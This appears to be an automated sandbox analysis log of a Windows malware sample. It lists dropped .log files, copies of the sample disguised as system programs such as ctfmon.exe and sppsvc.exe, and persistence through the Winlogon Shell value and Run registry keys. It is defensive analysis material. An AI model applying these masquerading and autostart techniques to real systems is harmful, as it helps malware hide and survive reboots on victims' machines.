Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\ZQiVzhgV.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\PfChbXEz.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\XYvNpROm.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\kEMLjtbD.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\nRXThXRl.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\sNIJIutM.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\eIOeVPZc.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\wSacHBjk.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\xhUJVuRJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\VponRhip.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\bbEWzzMV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\XwvpSNWN.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\tngbTVgk.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\BeMjthTj.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\AOCihfsW.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\yFCKRiMT.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\eTxcBbyX.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\UpgEQnOA.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\DhgBcIwD.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\zLwIlJoB.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Recovery\ctfmon.exe	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\qqitJWYB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\kxFTgqTN.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\WWWWHnjp.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\pRAsNhes.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\swusCNgs.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\MbnYeHgo.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\vbkkEjci.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\CdEzwRtl.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\oHbTlmtF.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\IuPYVmtj.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\yqvjUPym.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\lHNctDZP.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\QKWXiCZs.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\jLivJUwn.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\mTPcyfdR.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\DtUIufbH.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\vPfJpCEr.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\MwnZBuEN.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\uPLTKmLa.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\vmRteunU.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\EfqhSByg.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\IFwiuxEU.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\zupqWouz.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\MegGnYKL.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\VeGplWJv.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\gmTMvKjO.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\njHMYZdD.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\HpEyVDEi.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\fdKvAzJi.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\gHPdZtTT.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\koiTwEAQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\vnARymaC.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\lHNctDZP.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\OsAnoSoB.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\yqvjUPym.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\oHbTlmtF.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\mwFSlUNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\eTxcBbyX.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\VponRhip.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\zupqWouz.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\sNIJIutM.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\aGreoIOy.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\RYXOEfJQ.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\IuPYVmtj.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\HpEyVDEi.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	File created: C:\Users\user\Desktop\zLwIlJoB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\vnARymaC.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\fdKvAzJi.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\UpgEQnOA.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\CdEzwRtl.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\NJzXBuON.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\EfqhSByg.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\mTPcyfdR.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\koiTwEAQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\kxFTgqTN.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\BeMjthTj.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\qqitJWYB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\gHPdZtTT.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\XYvNpROm.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\OvnXGXyF.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\pRAsNhes.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\vbkkEjci.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\AOCihfsW.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\tngbTVgk.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\kEMLjtbD.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\bbEWzzMV.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File created: C:\Users\user\Desktop\ZQiVzhgV.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\MegGnYKL.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\vPfJpCEr.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\eIOeVPZc.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\VeGplWJv.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\MwnZBuEN.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\IFwiuxEU.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\WWWWHnjp.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\swusCNgs.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\QKWXiCZs.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\gmTMvKjO.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\PfChbXEz.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\wSacHBjk.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\njHMYZdD.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File created: C:\Users\user\Desktop\UXfGEDIo.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\FUcZRGSD.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\yFCKRiMT.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\nRXThXRl.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\eoPexdBD.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\MbnYeHgo.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\DtUIufbH.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\uPLTKmLa.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\pDLUlABc.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\XwvpSNWN.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\vmRteunU.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\DhgBcIwD.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\jLivJUwn.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\PtwPpPmY.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File created: C:\Users\user\Desktop\xhUJVuRJ.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sppsvc	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VIyu4dC9CU	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sppsvc	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sppsvc	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sppsvc	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sppsvc	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VIyu4dC9CU	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VIyu4dC9CU	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm	Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
